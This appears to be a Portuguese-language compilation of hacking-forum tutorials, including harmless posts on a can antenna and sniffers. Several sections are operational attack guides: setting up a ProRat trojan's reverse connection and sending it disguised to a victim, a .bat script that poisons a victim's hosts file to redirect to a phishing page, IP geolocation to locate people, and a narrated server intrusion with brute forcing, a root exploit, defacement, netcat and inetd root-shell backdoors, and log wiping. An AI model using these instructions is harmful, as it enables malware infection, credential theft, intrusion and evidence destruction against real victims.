um ip. Este site fara um ip unico para você, você escolhera um nome do seu
ip Ex: nefrei.no-ip.info. Mas como isso funciona ?? Logado na sua conta va
em ADD que está nas opçoes de Hosts / Redirects em uma barra esquerda do
site, la você da um nome ao seu ip fixo, e bota seu ip em numero ( PARA
VELO VA EM

http://WWW.MEUIP.COM.BR
). Deixe tudu do geito que está e va
em Creat Host. PRONTO VOCÊ TEM SEU IP FIXO ! Mas lembresse, toda vez ke
você se acessar a internet, seu ip tambem muda, então va em sua conta no
site, e mude o ip em numeros do seu IP FIXO, escolhendo a OPÇÃO manage da
barra Hosts / Redirects !





Pronto agora você tem seu ip-fixo. Va na pasta do ProRat, la existe um
programa chamado ProConective, abra-o , e deixe ele minimizado, agora abra
seu ProRat, Crie um servidor. Quando estiver criando, va em notificações e
bote seu ip fixo em Endereço Ip ( Dns ), se você escutar um som dizemdo "
conectado " e porque funcionou, termine de criar seu servidor. Junte ele a
outro programa qualquer e mande para a pessoa.



Depois que a pessoa tiver instalado o trojan, abra o ProRat, e va na opção
ProConetive, escolha a opção Começar a listar as Notificaçoes.

Pronto você recebera o ip da vitima e poderar fazer o que quiser.











ALERTA : depois de criar seu servidor e deixalo indetectavel, por algum
motivo quando o " ProConnective " está on, o Av e capaz de detectalo, ao
fexar o ProConnective, ele não detecta mais. NÃO SEI COMO ISSO IRA SE
PORTAR NA CASA DO PORTADOR DO TROJAN !







Eu não sei como se comporta o antivirus com arquivos .bat executado no
winrar, realmente não vou testalo no meu pc.





GALERA VAMOS DEIXAR UM RECADO AE SOBRE O QUE ACHARAM O/



*Galera eu sabia que isso iria acontecer, CERTIFIQUEM-SE , que o
ProConnective esteja aberto na hora de fazer o test.







Galera, So um recado, conexão reversa do Flux e bem melhor e mais facil,
intaum recomendo que usem ele.







REDIRECIONAMENTO PARA PAGINAS FALSAS

REDIRECIONAMENTO
PARA PAGINAS FALSAS



Para Aqueles que Utilizam Paginas Falsas Para Descubrir Senhas,
Ai Vai a Dica:



Com o Arquivo hosts que
esta localizada na pasta C:\WINDOWS\system32\drivers\etc\hosts,
é possivel redirecionar a para a pagina falsa que voce criou
quando a VITIMA tenta acessar a Página Verdadeira.



Para isso, edite o

arquivo
hosts e escreva
na ultima linha

n°_ip_da_pagina_falsa site_verdadeiro



Por Exemplo:

Voce quer Crackear uma Conta do Hotmail, então voce cria uma
pagina falsa, cuja o IP é 201.109.23.10.



Então na Ultima Linha voce escreve:



201.109.23.10

http://www.hotmail.com








Mas Como Vou Colocar Isso No Arquivo HOSTS da Minha Vitima



`

É Simples. Faça Uma Arquivo Em Lotes com o Código Abaixo:





Código:

Selecionar tudo

@ echo off

cd\

echo ip_pagina_falsa site_verdadeiro >> %windir%\system32\drivers\etc\hosts











Salve Com extensão .bat.

Depois Basta Enviar Para a Vitima



Abraço pessoal, Até a Próxima! Espero ter Ajudado!



FUIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII







Sniffers

Sniffers




Definição

Os sniffers ou farejadores são o tipo de programas mais usados para conseguir
senhas em uma rede. Eles ficam residentes na memória como um cavalo de tróia,
analisando todo o tráfego que ali passa. Qualquer entrada ou saída de

dados
é capturada, seja em um servidor FTP, uma página de chat ou um e-mail
digitado. O sniffer pega os pacotes recebidos em seu estado bruto e os
transforma em texto puro para serem lidos. Sempre foram mais usados em sistemas
Unix, mas ultimamente todos os outros sistemas contam com poderosos sniffers.
Desde sniffers comercias como o excelente Íris até sniffers mais simples, como o
tcpdump e sniffers de trojans. Vamos fazer uma análise de como esses perigosos
programas funciona

Imagem


Exemplo de uma tela de sniffer (programa IRIS)

Filtrando pacotes na rede



Muitas pessoas pensam que o sniffer pode ser usado em seu computador para
capturar pacotes do seu provedor. Não é bem assim. O programa têm de estar
instalado no computador central de uma rede em que se quer capturar pacotes.
Utilizando o exemplo do provedor, todos os seus usuários realizam o processo de
autenticação em um servidor antes de conectarem-se à rede. Assim, primeiro é
necessário conseguir invadir o servidor e depois colocar o sniffer. Ele irá
monitorar absolutamente tudo, às vezes até informações pessoais dos usuários,
como endereço e telefone. Como são muitos os pacotes em uma rede, o farejador é
configurado para obter somente o essencial e importante: as senhas.

Capturando senhas

A principal preocupação de um operador é , ou pelo menos deveria ser, as senhas.
Afinal, por mais seguro que o sistema seja, uma senha adquirida maliciosamente é
sempre perigosa. O único interesse dos crackers é capturar logins e senhas. Nem
se encontrar um e-mail de sua namorada para o amante o cracker deixará de se
concentrar em sua tarefa. Existem algumas opções que ainda possibilitam filtrar
os tipos de pacotes recebidos. Vamos supor que eu quero descobrir todas as
senhas que comecem com “C”. Após configurar o sniffer e esperar, ele começa a me
enviar os pacotes recebidos já “selecionados” com o que desejo.

Sniffers em trojans

Alguns trojans como o Back Orifice possuem sniffers como plug-ins (partes extras
que podem ser anexadas ao programa). O Buttsniffer, um dos melhores plug-ins
para o BO monitora absolutamente tudo no sistema Windows. Além de ter um arquivo
executável à parte, podendo funcionar sem depender do Back Orifice. Alguns
outros trojans mais novos já possuem o sniffer embutido. A tendência do sniffer
e do trojan é de se tornarem uma ferramente apenas, já que ambos têm
características parecidas. O trojan de e-mail k2ps é um bom exemplo disso. Ele
monitora e envia todo tipo de senha importante por e-mail (na verdade, alguns o
consideram um keylogger que é um programa que loga tudo que se escreve no
teclado, eu não o considero assim pois ele é seletivo: só envia coisas
importantes).

Roteadores

Alguns sniffers conseguem obter dados direto do roteador. Mesmo que seja
instalada uma proteção eficaz no sistema operacional, como um anti-sniffer, não
adiantaria de nada se o programa estiver pegando os dados diretamente roteados.
A correção têm de ser feita atualizando-se o próprio roteador. O ideal seria
procurar a página do fabricante e verificar se existe alguma dica ou informação
sobre o assunto. Afinal, o seguro morreu de velho.

Anti-Sniffers

Como o próprio nome diz, são programas que detectam tentativas de sniffing.
Ficam residentes na memória como um anti-trojans, aguardando o invasor tentar
algo. Há vários tipos de anti-sniffers, alguns bem ruinzinhos e outros muito
bons. Uma boa opçãos do software são fingir o envio de dados, para que o cracker
engane-se e pense que realmente está conseguindo as senhas. Se você têm sofrido
muitas invasões, certificou-se de não ser por falhas ou trojans, monte um
honeypot com um anti-sniffer. Com certeza deve pegar alguma abelhinha.
Experimente o programa Anti-sniff que pode ser pego no Superdowloads (http://www.superdownloads.com.br/).

Antena Wireless com Lata de Óleo de Soja

Antena Wireless com Lata de Óleo de Soja

Fala-se muito na intenet sobre construir antema
wireless a partir de uma lata de Pingles. Como eu sou Brasileiro e MEIO

anti-USA, então criaremos a antena a partir de uma lata de oleo soja nao
transgenica.






Segue o passo-a-passo.



Material:

1 conector N externo

1 lata de Óleo de soja qualquer vazia

fio 4.00 mm

solda

Alicate, ferro de solda, etc....




Imagem




Passo 1.

Limpe bem a lata, e abre corretamente uma das extremidades da lata tendo cuidado
para não ficar pontas que

podem cortar a mao.

Faça um furo à 1/4 da do fundo da lata como ilustrado no desenho abaixo.







Imagem


Passo 2.

Solde um pedaço de 3cm de fio rigido no conector N externo como mostra a figura
abaixo.






Imagem


Passo 3.

Encaixe o conector no furo feito na lata e prenda com parafusos de polca ou com
pop.




Imagem




Conector preso com
pop.






Imagem


Veja como ficou por dentro da lata.






Imagem




Esta pronto.. agora é so conectar
seu pig tail na antena e no seu cartao ou placa. Ou ate mesmo um

cabo


coaxial RGC213 pra colocar sua natena em um local mais apropriado.



A minha antena eu coloquei na janela mesmo.. deu visada perfeita pra torre onde
eu recebo sinal do meu provedor.






Imagem


antena na janela vista pelo lado de
dentro.






Imagem

Agora vista pelo lado de fora.







Para minha surpresa, o ganho de sinal com esta antena foi excelente. Muito
melhor do que as feita com

latas de batatas. Isto porque o diametro da lata e o seu comprimento são
apropriados para

a frequencia. Por isso, tome cuidado ao fazer esta antena com latas de outros
tamanhos. Procure uma lata

que tenha +/- 20cm de cumprimento e +/- 10 de diametro. Medidas diferentes desta
poderam

ter ganhos de sinal muito baixo.





Bom, é isso..






------------------------Milorde -----------------------------



dados extras.



é direcional, e em linha reta sem obstáculos chega a mais de 2 Km





sábado, 26 de abril de 2008

RASTREANDO UM ENDEREÇO DE IP

RASTREANDO UM ENDEREÇO DE IP




Escrito por SPYNET



Achei esses links interessantes, eles mostram a Cidade/País/CEP de um IP
informado.

E claro, não é 100% correto mas dá pra ter uma idéia legal do endereço.



Então vamos há algumas explicações dos passos para rastrear um IP.

Primeiro é bom distinguir IPs nacionais dos internacionais, no Brasil a faixa
inicial geralmente são:

200.x.x.x e 201.x.x.x, não é regra, há alguns com 207.x.x.x por exemplo mas não
é tão comum.

É necessário saber isto para agilizar sua busca, pois não adianta procurar no

sistema
de consulta de CEPs um IP lá da China.

Mas como cérebro foi feito pra lembrar a programação da TV e não números, aqui
vai a solução:

http://www.maxmind.com/app/lookup


Informe o IP, e será mostrado de qual ele pertence.

______________________________





Agora entendendo um pouco de como os sistemas de buscas relacionam CEPs com IPs:

Bom tudo começa das estruturas físicas da

rede
, físico me refiro a fios, postes, caixas telefônicas, localização do
provedor, etc. Quando você recebe um IP, seu provedor gera ele apartir do seu
CEP(não é bem um cálculo com seu CEP e sim questão de proximidades).

Explico: Supomos que você recebeu o IP 200.196.196.5 e seu vizinho recebeu
200.150.30.2, sendo que ele mora no mesmo CEP que vc,

o que aconteceria é que o ping(tempo para recebimento de pacotes)
demoraria(suposição) uns 150ms(isso é lento, sim eu amo parenteses :lol.

O que na realidade deveria ser uns 70ms mais ou menos.

Então o provedor lhe atribui IPs conforme seu CEP, sendo assim seu vizinho
provavelmente receberá um IP semelhante ao seu, pelo menos na teoria seria
assim, ao menos que se escasse os IPs semelhantes, mas aí é outro papo.

Entendido isso de CEP x IP, vamos a forma de rastreá-los.

______________________________



Há um projeto nacional chamado IPGeo mantido pelo Portal RankBrasil, que mantêm
um banco de dados com uma relação imensa de IPs -> CEPs. Bom ao certo de onde
eles colhem essas informações eu não sei, suponho que seja algo vinculado aos
provedores e ao Registro.br.



Então vamos lá, acesse o site:

http://www.ipgeo.com.br


E informe o IP que deseja consultar, como exemplo vou usar o meu atual: IP
200.203.3.62

O que vai acontecer, o sistema irá sempre mostrar uma série de resultados, pois
são os IPs mais semelhantes ao seu, caso encontre

exatamente o IP informado, ele irá ser mostrado no topo da lista.



Resultado obtido:

Citar

Proximidades de IP com CEPs confirmados



200.203.3.62 95020180 Caxias do Sul RS

200.203.3.63 95180000 Farroupilha RS

200.203.3.63 95700000 Bento Gonçalves RS

200.203.3.64 95020320 Caxias do Sul RS

200.203.3.64 95020460 Caxias do Sul RS

200.203.3.64 95097000 Caxias do Sul RS

200.203.3.65 95010100 Caxias do Sul RS





Próximo passo, como localizou meu IP exato, procurei no site dos correios o CEP
que me apresentou.



http://www.correios.com.br/servicos/cep/cep_cep.cfm




E olhem o resultado:




http://i2.tinypic.com/xni4g3.png








Sim, o endereço tá correto mesmo, aqui da empresa.

Ah detalhe bastante importante, MEU IP NÃO É FIXO NEM EMPRESARIAL.



Agora acontece também de não mostrar o IP informado e sim só os das
proximidades, então caso saiba mais informações(como a cidade por exemplo) sobre
o IP que está consultando, lhe ajudará a filtrar os resultados mostrados.

Acontece também de não mostrar corretamente a cidade, acredito que ocorre pois o
banco de dados pode estar desatualizado, sendo que é feito a nova verificação a
cada 24h, então caso tenha certeza que o resultado mostrado está incorreto,
anote o IP e consulte novamente dentro de algumas horas ou no dia seguinte.

Básicamente para IPs nacionais seria isso, como eu falei não é 100% mas ajuda.

______________________________



Ainda em buscas no Brasil temos outro recurso que é o Registro.br(http://www.registro.br/).

Já essa alternativa é mais adequada de quando estamos consultando IPs(fixos) de
servidores, os quais estão registrados um dominío, um IP fixo empresarial, etc.

Caso consultar um IP dinâmico qualquer, provavelmente os resultados serão os
dados do companhia de telecomunicações da região, como Brasil Telecom.

Exemplo, consultei pelo meu IP:

Citar

...

inetnum: 200.203.0/17

asn: AS8167

ID abusos: BTA17

entidade: Brasil Telecom S/A - Filial Distrito Federal

documento: 076.535.764/0326-90

responsável: Brasil Telecom S. A. - CNRS

endereço: SEPS 702/092 Cj. B - Bl B 3 andar Gen. Alencastro, S/N,

endereço: 70390-025 - Brasilia - DF

telefone: (61) 415-4201 []

ID entidade: BTC14

ID técnico: BTC14

inetrev: 200.203.0/24

servidor DNS: ns3.brasiltelecom.net.br

...



Agora outra consulta, mas pelo IP 200.176.3.142

Citar

...

inetnum: 200.176/16

asn: AS11706

ID abusos: ABT82

entidade: Terra Networks Brasil S.A.

documento: 091.088.328/0003-29

responsável: Hostmaster Terra Networks

endereço: João Manoel, 90,

endereço: 90010-030 - Porto Alegre - RS

telefone: (51) 32844000 []

ID entidade: MPL4

ID técnico: MPL4

inetrev: 200.176.0/18

servidor DNS: ns1.terra.com.br

...



Como deu pra notar, é o IP do terra.com.br, então essa é a diferença de um IP
registrado.

______________________________



Mas e no caso de um IP que não seja do Brasil ?

Bom aí se fizermos pelo método anterior não teremos resultados precisos. Para
isso há outro site americano, MaxMind

que disponibiliza recursos semelhantes ao IPGeo.

Acesse:

http://www.maxmind.com/app/lookup_city


E a teoria é a mesma, porém como é outro país o sistema de caixa postal (CEP)
será diferente.

Então como saber onde procurar, aqui:


http://www.embassyworld.com/data/Zip_Codes.html


há uma listagem de serviços e sites que buscam códigos postais de diversos
países.



Vamos a um exemplo na prática!



Enquanto estava no painel de administração do Fanta Hackers observei que tinha
um visitante com IP do exterior, esse: 65.214.39.151

Fiquei curioso e resolvi rastrear ele, vamos aos passos:

- Descobrindo País/Cidade/Estado

Resultado:




http://i2.tinypic.com/xni5n7.png




- Como ninguém nasceu de susto, vamos confirmar realmente se o MaxMind trouxe
informações boas. Para isso consultaremos também no Whois (http://whois.lacnic.net/)
que é o substituto do Registro.br mas para consultar internacionais.

Então tudo certo, os dados estão corretos mesmo:

Citar

OrgName: AskJeeves, Inc.

OrgID: C00555427

Address: 5858 Horton Street

City: Emeryville

StateProv: CA

PostalCode: 94608

Country: US



Bom essa foi fácil, como deu pra notar é um IP empresarial no qual já nos
mostrou inclusive o nome da organização AskJeeves

- Uma consulta rápida no oráculo pela empresa e chegamos à
http://www.ask.com/

- Pra quem deduziu, descobrimos já quem é nosso visitante. Como trata-se de um
portal de buscas, o nosso convidado é um WebBot que esta catalogando os dados
contidos no Fanta.

Mas vamos continuar a busca:

- Acesse

http://maps.google.com
e informe o nome da empresa AskJeeves

- Altere o modo de visualização para Hybrid(imagem de satélite + nomeclatura de
ruas)



- Ao lado, irá nos mostrar uma listagem de diversas filiais da empresa, como já
sabemos que a desejada encontra-se em Emeryville - California, selecionamos
esta.

- Chegamos ao resultado preciso abaixo:




http://i3.tinypic.com/xni81h.png






Alguém quer fazer uma visita a eles?



-------



Porém como citei antes, essa foi fácil, localizar uma empresa não é nada
complicado. Mas e no caso de um usuário internacional comum?

Nesse ponto nossos recursos se restringem um pouco, mas vamos ver até onde
conseguimos chegar.



Nosso IP de exemplo será: 69.18.1.201

- Consultando a localização

http://www.maxmind.com/app/lookup_city





http://i3.tinypic.com/xni8e8.png




- O que identificamos: Local Internet Service Company, bom agora complicou pois
não é tão simples como antes, descobrimos que o IP é de um Provedor de Internet.

Ou seja, um usuário comum.

- Seguimos direto para o Google Maps e informamos os dados da cidade:



- Nesse caso o melhor modo de visualização é Map;

- Como essa cidade Fairfield parece ser o lugar onde o diabo perdeu as meias, o
zoom no mapa é bem limitado:




http://i1.tinypic.com/xni8o7.png




- Então vamos tentar no MapQuest(http://www.mapquest.com/)
e informamos o código postal: 52556

Bom, um pouco mais detalhado...




http://i3.tinypic.com/xni92b.png






Com isso as informações que temos, consiguimos chegar até este ponto, não
obtivemos o endereço específico, mas uma noção boa da localização.



______________________________





Bom, então o passo-a-passo que eu sugestionaria para iniciar um rastreamento
seria os seguinte:

- Analise o IP e descubra qual seu país;


http://www.maxmind.com/app/lookup




- Sabendo a nacionalidade:

* Se for nacional:

1) Consulte no

http://www.registro.br


2) Se constatar que o IP não está registrado, pesquise novamente em

http://www.ipgeo.com.br


3) Tendo o CEP em mãos, consulte ele


http://www.correios.com.br/servicos/cep/cep_cep.cfm


* Caso seja internacional:

1) Busque primeiro no Whois:

http://whois.lacnic.net


2) Senão retornar nada útil tente em:

http://www.maxmind.com/app/lookup_city


3) Descoberto o país, consulte em


http://www.embassyworld.com/data/Zip_Codes.html


4) Acesse algum dos sites da lista referente ao país do IP

5) Busque pelo código postal localizado

6) Caso seja americano, uma boa dica é procurar no Google Maps



- E se não conseguiu com nenhuma dessas alternativas, bom aí só resta ligar para
o provedor do IP, e tentar passar uma engenharia

social convencendo eles a te darem os dados do IP. O que eu acho quase
impossível, a menos que vc seja da PF hahaha.

SIMPLES ATAQUE RACKER

EXEMPLO DE UM SIMPLES ATAQUE
HACKER PARA INICIANTES



Olá pessoal, estou escrevendo esse tópico porque muita gente que nunca
invadiu realmente não faz a mínima idéia de como é fazer tal coisa ou se já
invadiu não sabe o que fazer após "avançar entre as entranhas do alvo". Esse
pode ser um tópico bem idiota eu admito, mas com ele espero dar uma luz para os
iniciantes. Esse tópico vai mostrar o exemplo de um defacement. Como achar um
alvo vulnerável, como não ser pego em uma invasão, etc. Tudo isso em uma pequena
historinha fictícia, mas com ferramentas e vulnerablilidades reais. Vamos
começar.



(1-) O início:



Aqui o hacker que eu vou chamar de Jonathan criou um mirror(página criada para
fazer o defacement de um site substituindo-a pela original) em html. Ela tem um
fundo preto, com uma grande mensagem escrito "Exploited by Cyb3r_D14bl0" que se
trata do apelido hacker de Jonathan, além de uma foto criada por ele muito legal
no photoshop, sua marca registrada, além de um link que permite enviar um email
para ele próprio. John está frustrado e aborrecido porque não encontra nenhum
alvo vulnerável. Mas hoje Jonathan jurou que não sairia da frente do computador
até que conseguisse hackear um site. Jonathan então toma as primeiras
providências para o ataque.



(2-) Escondendo-se na rede:



O fato do mirror de Jonathan ser simples, não significa que ele é um imbecil.
Ele sabe que deve ocultar seu endereço ip ou será pego na primeira tentativa de
ataque. Jonathan começa acessando a página

http://www.stayinvisible.com
. Essa página mostra o endereço ip de
seus visitantes. O ip de Jonathan é 201.143.222.88. Então ele usa o programa
Anonymity4Proxy, e procura o endereço ip de um bom servidor proxy na grande
lista do programa. Ele encontra um servidor proxy no México marcado como high
anonymity(alto anonimato). Isso é bom para Jonathan. O endereço ip desse proxy é
67.154.22.224. Jonathan liga o computador do lado que está rodando Linux
slackware 10.2 (ele antes estava em outro com Windows XP sp2). Jonathan
configura os browsers e serviços adicionais de ambos os sistemas para que se
conectem ao proxy. Jonathan acessa a novamente a página

http://www.stayinvisible.com
e sorri ao ver que em ambos os
sistemas o seu ip não apareceu mais na página, e sim o ip do proxy que Jonathan
escolheu. Agora ele está anônimo e pronto para atacar.



(3-) FootPriting & FingerPriting. Invadindo...:



Nessa fase do ataque, Jonathan vai procurar por alvos vulneráveis e explorá-los
com o objetivo de invádi-los. Jonathan começa visitando alguns sites e de
repente, sem querer Jonathan acessa um site chamado

http://the-fact-pleasure.net
. Se trata de um site de pedofilia! Se
tem uma coisa que Jonathan odeia são os pedófilos. Jonathan escolheu seu
alvo(atenção esse site é fictício). Jonathan começa abrindo um terminal em seu
sistema linux e digitando o seguinte comando no terminal:



# ping -c4 the-fact-pleasure.net





Isso envia 4 pacotes do tipo icmp echo request para o site. Com isso Jonathan
pega o ip do site que é 208.194.22.126 e também Jonathan percebe que o site
normalmente respondeu a todos os pacotes. Isso significa que o firewall do site
não deve estar filtrando tráfego icmp. Jonathan analisa o esquema de
endereçamento ip e deduz as seguintes informações a respeito da rede do alvo:



(a-)Se trata de uma rede de classe C(o ip começa com 3 dígitos maior que 191).

(b-)A máscara da rede é de 255.255.255.0 (somente os últimos 3 digítos dos
endereços ips sofrem alterações).

(c-)Pode-se ter até 255 computadores na rede( 208.194.22.1 até 208.194.22.255).




Agora Jonathan deseja descobrir quais desses host estão online na rede, então
ele vai usar um ping scan utlizando-se do nmap para tal, usando a seguinte linha
de comando:



# nmap -sP -vv 208.194.22.1-255 > /home/log_hosts.txt



Após alguns minutos, Jonathan checa o log e ve que os seguintes hosts estão "alive":



208.194.22.12

208.194.22.17

208.194.22.56

208.194.22.88

208.194.22.100

208.194.22.115

208.194.22.126

208.194.22.201

208.194.22.211

208.194.22.253



Caso o servidor do site esteja muito protegido, Jonathan poderá tentar hackear
esses computadores para usa-los como "trampolin" para o servidor do site. Agora
ele vai fazer o teste de fingerpriting para pegar informações preciosas sobre o
servidor do site. O comando é o segunite:



# nmap -O -vv -sV 208.194.22.126





Esse teste retomou as seguintes informações:





as portas tcp 21,22,25 e 80 estão abertas. (Serviços ftp, ssh, smtp e http).

O sistema operacional é linux red hat 2.4.18 ou 2.4.19(sem certeza).

Na porta 21 está um servidor pureFTPD, na 22 um servidor open ssh 1.1, na 25 um
servidor qmail e por último um apache mod_ssl v 1.3.37]



Jonathan ja adquiriu bastante informações sobre o alvo até aqui. Mas ele deseja
saber mais ja que até aqui ele não encontrou uma vulnerabilidade perigosa que o
permita invadir o sistema. Ele tenta então traçar a rota para descobrir mais
informações a respeito do firewall do alvo, ele então digita o seguinte comando
no seu terminal:



# traceroute 208.194.22.126





Normalmente em um traçamento de rotas, o penúltimo salto é o firewall do alvo e
o penúltimo salto era o endereço ip 194.126.22.1. Agora ele tem o ip do possível
firewall do alvo. Para ter certeza ele faz o seguinte teste com o nmap:



# nmap -vv -O 194.126.22.1



Isso gerou o seguinte resultado:



(a-)as portas 1000 está abertas...

(b-) Device type: firewall/router





Agora Jonathan tem certeza de que se trata de um firewall e um firewall que ele
conhece muito bem. O Web min que é configurado via browser, Jonathan digita a
seguinte url no seu navegador konqueror do linux:

http://194.126.22.1:1000




Uma tela de login de administração de firewall acaba de se abrir no seu
navegador!



Em seguida, Jonathan scaneia a rede do firewall, apenas tentando localizar as
portas 79 e/ou 23 em algum computador aberto, para isso ele usa novamente o nmap
com o seguinte comando:



# nmap -sT -p23,79 -vv 194.126.22.2-255 > /home/log2.txt



Ao analisar o log, Jonathan ve que o host e194.126.22.131 está com as portas 23
e 79 abertas. Jonathan da o comando finger nesse host e enumera os seguintes
usuários:



root

mark

lizie

guest



Jonathan se utiliza do programa Brutus para fazer brute force no telnet e obtém
sucesso. A senha do root é $!#donothackit$!#



Jonathan invade o host e baixa os arquivos passwd e shadow, em seguida faz
cracking deles com o programa john the ripper. Ele deduz que os usuários podem
ser os mesmos para todos os hosts dessa rede, já que foram muito poucos os
computadores marcados como "alive".



Jonathan deduz correto. A conta login mark/password h4xor1234 é a conta do
administrador do firewall. Antes de simplesmente derrubar o firewall do alvo,
Jonathan faz outro teste com o nmap no site para descobrir quais portas estão
abertas, mas que estão sendo filtradas pelo firewall. Jonatham executa o
seguinte comando no seu terminal:



#nmap -sA -vv -p1-200 208.194.22.126



As seguintes portas estão marcadas como "unfiltered": 21,22,23,53,69,79,80,110



Bingo! Mais um telnet! Agora sim Jonathan invade o firewall derrubando-o e em
seguida da um finger no sistema. Jonathan consegue apenas enumerar o usuário
lilith. Ele usa novamente o brutus para fazer brute force no telnet e descobre a
senha do usuário lilith. Ele conseguiu uma shell remota em seu alvo com poderes
normais.



a saída foi:



[server04@lilith]$



Jonathan digita id e ve o que ele possui um uid = 1000 e um gid = 1000. Ele
precisa obter acesso root para fazer o defacement. Ele lembra da versão do
apache e tem uma idéia. Primeiro ele executa esse comando na shell:



$find /bin -perm +4000



Ele sorri ao ver que a sua conta hackeada tem permissão para usar o ftp. Ele
conecta em um ftp de um site hacker, baixa um exploit local que explora um bug
no apache. Em seguida Jonathan o compila:



$gcc -o gotRoot exploit_exemplo.c



E o executa....



Jonathan fica empolgado e a adrenalina no seu corpo aumenta. ele ve outra shell
em sua tela



[server04@root]#



Ele digita esses comandos só para confirmar



# id

# whoami



Ele está logado como root! Sem perder tempo ele executa o seguinte comando:



# whereis apache



a saida foi:



/home/root/apache



Basta executar:



# cd /home/root/apache

# cd htdocs



Jonathan executa um ls e pronto! Ele localiza o index1.html! Agora é hora de
desfigurar a página:



Ele remove a página usando o comando:



# rm index1.html



Em seguida ele vai transferir seu mirro via linha de comando. Seu computador
está com o serviço ativo de ftp, então Jonathan usa o servidor do site no seu
computador dando o seguinte comando:



# ftp 201.143.222.88 user Cyber pass Diablo



Após conectar, basta dar o seguinte comando:



> get index1.html



Agora Jonathan desconecta do seu ftp e move o mirror para o local da página
original com o seguinte comando:



mv /ftp-files/index1.html /home/root/apache/htdocs



Pronto, a página foi desfigurada! Agora Jonathan precisa dar um jeito de criar
suas backdoors e apagar seus rastros no sistema.



(4-) Backdoors:



Primeiramente, Jonathan foi para o diretório principal do sistema com o comando:



# cd /etc



Lá, ele editou o arquivo rc.local com o editor vi inserindo a seguinte linha de
comando nele:



nc -l -p 6012 -e /bin/sh



Isso lhe da uma shell imediata com poderes de root sem qualquer forma de
autenticação na porta tcp 6012 no próximo boot do sistema.



Jonathan cria uma conta pirata no sistema com poderes de root com o comando
adduser e depois altera os privilégios de uma conta qualquer para root, assim
despistando os administradores.



Por último, Jonathan percebe que o sistema é antigo, pois possui o arquivo
inetd.conf em /etc. Ele edita esse arquivo também com o vi inserond o nele o
seguinte conteúdo:



cool stream tcp nowait root /bin/sh -i



E depois também edita arquivo services com o seguinte conteúdo:



cool 775/tcp cnn



Mais uma shell para Jonathan....



Agora com suas backdoors, Jonathan vai apagar os logs do sistema para não ser
pego usando esses comandos:



# echo " " > /var/log/ossec/*.log

# echo " " > /home/root/apache/logs/*.log

# echo " " > ~ .bash_history

# echo " " > /var/log/ossec/*.log



Com isso todos os logs do sistema ficam com conteúdo em branco(nulo). Por
último, Jonathan da um reboot no sistema para suas backdoors serem ativadas, ele
desconecta do seu alvo e proxy. Jonathan sorri ao acessar

http://the-fact-pleasure.net
e visualizar seu mirror. E o melhor
de tud é que ele dificilmente vai ser pego por isso...



Bom gente é isso ai, espero que vocês gostem. Isso é ridiculo para os hackers
experientes desse fórum, mas espero ter ajudado os iniciantes a entenderem como
um ataque hacker é realizado. Foi um exemplo simples, mas espero que tenha
valido a pena. Abraço pra todos, fui.